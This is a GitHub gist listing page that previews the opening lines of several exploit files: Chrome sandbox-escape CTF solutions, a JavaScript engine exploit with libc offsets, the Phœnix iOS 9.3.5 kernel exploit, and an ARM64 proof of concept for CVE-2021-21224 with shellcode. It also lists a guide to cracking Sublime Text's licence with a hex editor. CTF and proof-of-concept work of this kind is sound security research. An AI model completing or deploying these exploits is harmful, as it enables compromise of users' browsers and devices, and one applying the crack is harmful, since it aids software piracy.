- Download & Install Sublime Text 3.2.2 Build 3211
- Visit https://hexed.it/
hkraw
/ 0ctf2020-fullchain++-cfi.html
Created
July 14, 2021 11:03
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>0ctf sbx</title> | |
| </head> | |
| <body> | |
| <h1>HK</h1> | |
| <pre id='log'></pre> | |
| </body> | |
| <script src='./mojo_bindings.js'></script> | |
| <script src='./mojo_js/third_party/blink/public/mojom/tstorage/tstorage.mojom.js'></script> |
hkraw
/ redpwn-empires.html
Created
July 10, 2021 13:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title>RedPwn sbx-1</title> | |
| </head> | |
| <body> | |
| <h1>:thonk:</h1> | |
| <pre id='log'></pre> | |
| </body> | |
| <script src='./mojo_bindings.js'></script> | |
| <script src='./third_party/blink/public/mojom/desert.mojom.js'></script> |
bb33bb
/ Crack Sublime Text Windows and Linux.md
Created
June 11, 2021 09:25
— forked from JerryLokjianming/Crack Sublime Text Windows and Linux.md
Crack Sublime Text 3.2.2 Build 3211 and Sublime Text 4 Alpha 4098 with Hex
hkraw
/ javascript-for-dummies-1.js
Created
June 6, 2021 04:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function pwn() { | |
| /* Helpers */ | |
| var k_jsObjectSize = 0x70 | |
| var fclose_got = 0x45e58 | |
| var __libc_atoi = 0x18ea90 | |
| var __libc_environ = 0x1ef2e0 | |
| var __free_got = 0x4dde0 | |
| var __je_free = 0x13b10 |
lbherrera
/ index.html
Created
May 30, 2021 16:39
Solution for the MessageKeeper challenge from Pwn2Win 2021
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>Pwn2Win | MessageKeeper</title> | |
| </head> | |
| <body> | |
| <script> | |
| let alphabet = "0123456789abcdef"; | |
| const sleep = (ms) => { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <stdlib.h> | |
| #include <mach/mach.h> | |
| #include <CommonCrypto/CommonCrypto.h> | |
| #include <ctype.h> | |
| void hexdump(void *ptr, int buflen) { | |
| unsigned char *buf = (unsigned char*)ptr; | |
| int i, j; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sleep( sleepDuration ){ | |
| var now = new Date().getTime(); | |
| while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
| } | |
| function gc() { | |
| for (let i = 0; i < 0x10; i++) { | |
| new ArrayBuffer(0x1000000); | |
| } | |
| } | |
| let data_view = new DataView(new ArrayBuffer(8)); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import time | |
| import sys | |
| from base64 import b64encode | |
| from requests_ntlm2 import HttpNtlmAuth | |
| from urllib3.exceptions import InsecureRequestWarning | |
| from urllib import quote_plus | |
| requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) |
Peterpan0927
/ phoenix.c
Created
April 23, 2021 02:27
— forked from Siguza/phoenix.c
Phœnix exploit / iOS 9.3.5
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Bugs by NSO Group / Ian Beer. | |
| // Exploit by Siguza & tihmstar. | |
| // Thanks also to Max Bazaliy. | |
| #include <stdint.h> // uint32_t, uint64_t | |
| #include <stdio.h> // fprintf, stderr | |
| #include <string.h> // memcpy, memset, strncmp | |
| #include <unistd.h> // getpid | |
| #include <mach/mach.h> | |
| #include <stdlib.h> |
wdormann
/ CVE-2021-21224.html
Last active
October 31, 2022 22:01
Sample ARM64 PoC for CVE-2021-21224
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function gc() { | |
| for (var i = 0; i < 0x80000; ++i) { | |
| var a = new ArrayBuffer(); | |
| } | |
| } | |
| let shellcode = [ | |
| // Move x18 to x28 (TEB) |